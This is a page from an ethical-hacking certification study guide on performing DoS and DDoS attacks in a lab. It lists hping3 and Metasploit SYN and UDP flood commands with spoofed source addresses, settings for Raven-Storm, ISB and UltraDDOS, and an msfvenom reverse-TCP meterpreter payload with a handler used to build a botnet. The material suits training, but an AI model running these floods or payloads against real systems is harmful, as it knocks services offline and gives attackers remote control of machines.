CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • 1. Perform DOS (syn flooding) using Metasploit
  • 2. Perform DOS attack using HPing3
  • 3. Perform a DOS attack using Rven-Storm
  • 4. Perform DDOS using HOIC
  • 5. Perform DDOS using LOIC
  • 6. Perform a DDoS Attack using ISB and UltraDDOS-v2
  • Ultra DDOS tool
  • 7. Perform a DDoS Attack using Botnet

Was this helpful?

  1. Module 10. Denial of Service

1. Perform DOS and DDOS with various techniques

As an expert ethical hacker or pen tester, you must have the required knowledge to perform DoS and DDoS attacks to be able to test systems in the target network.

1. Perform DOS (syn flooding) using Metasploit

use auxillary/dos/tcp/synflood
set RHOST 192.168.18.110
set RPORT 21
set SHOST 192.168.18.1    \\Spoofed IP
exploit

2. Perform DOS attack using HPing3

hping3 -S 192.168.18.110 -a 192.168.18.1 -p 22 --flood

-S sets the syn flag

-a spoof the address

--flood sends a large no of packets

Ping of death

hping3 -d 65538 -S -p 22 --flood 192.168.18.110

-d sets the data size

UDP protocol flooding on NetBios (139)

hping3 -2 -p 139 --flood 192.168.18.110  \\-2 specifies the UDP mode

3. Perform a DOS attack using Rven-Storm

sudo rst
l4
ip 192.168.18.110
port 8080
threads 20000
run

4. Perform DDOS using HOIC

5. Perform DDOS using LOIC

6. Perform a DDoS Attack using ISB and UltraDDOS-v2

  1. One the ISB tool, ISB window appears, using this tool we can perform various attacks such as HTTP Flood, UDP Flood, TCP Flood, TCP Port Scan, ICMP Flood, and Slowloris. Additionally, we can gather Target Info using the WHOIS, NS, TRACEROUTE, BROWSER, PING options present in the tool.

  2. Here, we will perform TCP Flood attack on the target Windows Server 2019 machine. To do so, enter the IP address of the Windows Server 2019 in the URL: field (here, 10.10.1.19), port number (here, 80) in the Port: field and click on Set Target.

  3. The IP address of Windows Server 2019 along with the port number appears in the Set: field.

  4. Now, under Attacks navigate to TCP Flood tab and type 10 in the Interval field, 256 in the Buffer field and 1000 in the Threads field.

Ultra DDOS tool

  1. Run ultraddos.exe file.

    If an Open File - Security Warning appears, click Run.

  2. A Command Prompt window appears, in the Ultra DDOS v2 window, click OK.

  3. In the Ultra DDOS v2 window, click on DDOS Attack button.

  4. In the Please enter your target. This is the website or IP address that you want to attack. field, type 10.10.1.19 (IP address of Windows Server 2019 machine) and click OK.

  5. In the Please enter a port. 80 is most commonly used, but you can use any other valid port. field, enter 80 and click OK.

  6. In the Please enter the number of packets you would like to send. More is better, but too many will crash your computer. field, type 1000000 and click on OK.

  7. In the Please enter the number of threads you would like to send. This can be the same number as the packets. field, type 1000000 and click on OK.

  8. In the The attack will start once you press OK. It will keep going until all requested packets are sent. pop-up window, click OK.

  9. As soon as you click on OK the tool starts DoS attack on the Windows Server 2019 machine.

  10. Click Windows 11 to switch to the Windows 11 machine, and in the ISB window click on Start Attack button.

You can open the resource monitor to view that resources are being exhausted.

7. Perform a DDoS Attack using Botnet

Create a metasploit exploit.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=6969 -f exe > exploit1.exe

Similarly make exploits fir each of your bot.

Now, you can directly run multihandle, running the following command.

msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 6969; run"

Now, you can upload scripts to exploited targets.

Now, you can run the script from all your bots. Run the DDoS file using command python eagle-dos.py on windows shell terminal. It will ask for Target's IP, type 10.10.1.9 and hit enter.

PreviousModule 10. Denial of ServiceNext2. Detect and Protect DOS and DDOS attacks

Last updated 6 months ago

Was this helpful?

isb1.jpg
isb2.jpg

Leave the ISB window running and click to switch to the Window Server 2022 machine.

Screenshot
Screenshot
Screenshot
Screenshot
Screenshot
Screenshot
Screenshot
Screenshot
Windows Server 2022
Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
GitHub - Tmpertor/Raven-Storm: Raven-Storm is a powerful DDoS toolkit for penetration tests, including attacks for several protocols written in python. Takedown many connections using several exotic and classic protocols.GitHub
ISBSourceForge
UltraDDOS-v2SourceForge
GitHub - WH1T3-E4GL3/eagle-dos: light weight dos attack tool to attack to a single port to any network.GitHub
Logo
Logo
Logo
Logo
Logo